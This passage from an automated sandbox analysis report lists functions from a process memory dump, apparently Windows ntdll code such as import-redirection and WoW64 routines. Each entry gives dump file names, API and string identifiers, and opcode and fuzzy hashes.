                                                              APIs
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 359C4888
                                                              • LdrpCheckRedirection, xrefs: 359C488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 359C4899
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 3446177414-3154609507
                                                              • Opcode ID: e70caf70cac845006b43b8c26514aa71fc85213527a8db06e689c987eef053bf
                                                              • Instruction ID: 2732a8f1b17add6b843a2ba1712439dab00611a4b2b1cf8dfd63f15fdcd8aff6
                                                              • Opcode Fuzzy Hash: e70caf70cac845006b43b8c26514aa71fc85213527a8db06e689c987eef053bf
                                                              • Instruction Fuzzy Hash: 8B41AF76B08351CFDB11CE58D840A167BE9BB89692F060599EC4EA7251D724E801CB92
                                                              Function 359F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: bb0a2bc524f8b38700ff5ec97adca74d567c59ec74ef7ccafb9866cbff96a92e
                                                              • Instruction ID: 0a8dcec3d00c50bf4984a5b798b4a3a8b091002b2042cf10f3e49a41e90dcf34
                                                              • Opcode Fuzzy Hash: bb0a2bc524f8b38700ff5ec97adca74d567c59ec74ef7ccafb9866cbff96a92e
                                                              • Instruction Fuzzy Hash: A63182B6A006199FDB10CE29CC40BEE77BCFB44651F854596E849E7200EB71EA458FA0
                                                              Function 359C5F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Wow64 Emulation Layer
                                                              • API String ID: 3446177414-921169906
                                                              • Opcode ID: d8cff3520e50794bde504bebcceeba19ba2d61de6d1196079e292ad77383d6a5
                                                              • Instruction ID: ac562d8d9e1ca02072e893ffd802e6073ca25af62bc09645dc1778dc03cff0ee
                                                              • Opcode Fuzzy Hash: d8cff3520e50794bde504bebcceeba19ba2d61de6d1196079e292ad77383d6a5
                                                              • Instruction Fuzzy Hash: 9E21FE75A0425DBFAB01DAA0DD84DBF7B7DEF842D8B0504A4FE15A2140D730AF15EB61
                                                              Function 35A17CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 2a722035578619f7a0edd96fe4c16488c50f9187a9c5726e376e90c3bf8383e6
                                                              • Instruction ID: 582c57373b3673bffd9c7a5f2711e8c07be01fb29a23ec6479e9f63f7d12ff8c
                                                              • Opcode Fuzzy Hash: 2a722035578619f7a0edd96fe4c16488c50f9187a9c5726e376e90c3bf8383e6
                                                              • Instruction Fuzzy Hash: E9E15E71E0430EABDB15CFA4C885FAEBBB9BF04355F10812AED15EB280D774AA45DB50
                                                              Function 3596EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4068fdcd6728cc5716db2a1c048857e4fbee3200f89baad8c32ded8f251c7e79
                                                              • Instruction ID: f4b5fe3a0947a7167c4137b56c2e8fa6814cf124a74f2b2e65cd2be6d4df3af1
                                                              • Opcode Fuzzy Hash: 4068fdcd6728cc5716db2a1c048857e4fbee3200f89baad8c32ded8f251c7e79
                                                              • Instruction Fuzzy Hash: 39E10275E04708DFDB21CFA9C980A8DBBF6FF48368F20456AE446A7265DB70A845CF10
                                                              Function 359BEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 36d4524db1b3277c13e7a7f5576a5c770044a676c6d49fb64ff993d121f73b74
                                                              • Instruction ID: abeffa2b64fa0904d64f9e4a9fcfd5314babefdccc1403ae11f3618dd2c5e3ee
                                                              • Opcode Fuzzy Hash: 36d4524db1b3277c13e7a7f5576a5c770044a676c6d49fb64ff993d121f73b74
                                                              • Instruction Fuzzy Hash: FD7136B1E04219AFEF05CFE8D980ADDBBB9BF48354F14802AE905BB250D7B4A905CF50
                                                              Function 35A1A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: b2b0994a84b9afb00f83d9eb42e93867979983a9a2cac7f66d9991833d1177ad
                                                              • Instruction ID: e137c74b2fa07550f3135f8f4697829443320fcee8bc5942515719b2028fe675
                                                              • Opcode Fuzzy Hash: b2b0994a84b9afb00f83d9eb42e93867979983a9a2cac7f66d9991833d1177ad
                                                              • Instruction Fuzzy Hash: 285159797086129FEB08CE19C9A4E19B7F2BB88364B104069DD16DB710DB70EE41EBC0
                                                              Function 359BF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 00d6b63c8431d6e500796f2cb2cea4392ec16086a78bf50d97fda16553813996
                                                              • Instruction ID: f553fe53434a0c66922214011e5bee2253583dee8168a164f1eb1c36672b6edf
                                                              • Opcode Fuzzy Hash: 00d6b63c8431d6e500796f2cb2cea4392ec16086a78bf50d97fda16553813996
                                                              • Instruction Fuzzy Hash: F55111B5E04219AFEF04CFD8D844ADDBBB5FB48394F14812AE815B7250DBB89941CF54
                                                              Function 35977B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                              • String ID:
                                                              • API String ID: 4281723722-0
                                                              • Opcode ID: 410f997682bbbdfd1141ac9ec507494cda439baa52691b568c5d8a81556774bd
                                                              • Instruction ID: c42533c9a532bfd7c19a658ef62472b96f1015b3e704850d95eb9a746f2d8619
                                                              • Opcode Fuzzy Hash: 410f997682bbbdfd1141ac9ec507494cda439baa52691b568c5d8a81556774bd
                                                              • Instruction Fuzzy Hash: 5C3125B5E18218DFDF55DFA8D844A9DBBF1FB48320F10416AE415B7290DB316902DF94
                                                              Function 359459C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: db96d633ac7f1858fbaaa5866c7a0dd3a23f0f63b1cfe1a1c3d980e447f75b7b
                                                              • Instruction ID: 756c429d79d8f9a0760036e4dceaf10033084e8c3ee616308f99b1868a543329
                                                              • Opcode Fuzzy Hash: db96d633ac7f1858fbaaa5866c7a0dd3a23f0f63b1cfe1a1c3d980e447f75b7b
                                                              • Instruction Fuzzy Hash: 5B3238B4904369DFEB25CFA4C984BDEBBB5BB08304F0081E9D549A7241DBB46E84CF91
                                                              Function 35987D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 24675460c14446fb96a8ac8d7a3f8fd893f4fba61e7a5d153f5179624a34473a
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: FF91D475E0422A9FEB14CF6ACC80AAEB7B9FF44360F50451AE855E72D1DB32D941CB20
                                                              Function 35974C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$Flst
                                                              • API String ID: 0-758220159
                                                              • Opcode ID: 272d024bf9d1b7bd699e6fe25de69cc4c649741e6ef689a052f3e8e854065173
                                                              • Instruction ID: aeb69187a2513be012584ff54d5404c94726aa33690d812c9679576d25caf45e
                                                              • Opcode Fuzzy Hash: 272d024bf9d1b7bd699e6fe25de69cc4c649741e6ef689a052f3e8e854065173
                                                              • Instruction Fuzzy Hash: 77515EB5E00218CFEB15CF99C844A99FBF9FF44754F15806AD08D9B251EBB0AA45CB80
                                                              Function 359404E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • kLsE, xrefs: 35940540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3594063D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 3446177414-2547482624
                                                              • Opcode ID: 9b62a0b24a58916cb61ca96d9ac03e9fb91af1224c5ad31c7706734a69327d57
                                                              • Instruction ID: 8784185832a30957bf407a522672db192142019765ddf1d5127aad82b826434c
                                                              • Opcode Fuzzy Hash: 9b62a0b24a58916cb61ca96d9ac03e9fb91af1224c5ad31c7706734a69327d57
                                                              • Instruction Fuzzy Hash: 2851CCB56187428FD324DF26C540A97B7E9FF84304F01893EE9AA8B241E730E945CB92
                                                              Function 3593DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0$0
                                                              • API String ID: 3446177414-203156872
                                                              • Opcode ID: 6c22cd6e2b16c096bc4b21a3c995842dbd43bc567d4cdac4c1e5e08cdfe79c14
                                                              • Instruction ID: 640e8348282db7fbd91c873f2276d84da5e08393641750287bee65a7d9e8bb9c
                                                              • Opcode Fuzzy Hash: 6c22cd6e2b16c096bc4b21a3c995842dbd43bc567d4cdac4c1e5e08cdfe79c14
                                                              • Instruction Fuzzy Hash: E0416AB5609706DFD300CF28C485A5ABBE9BB88354F04496EF888DB341D771EA06CF96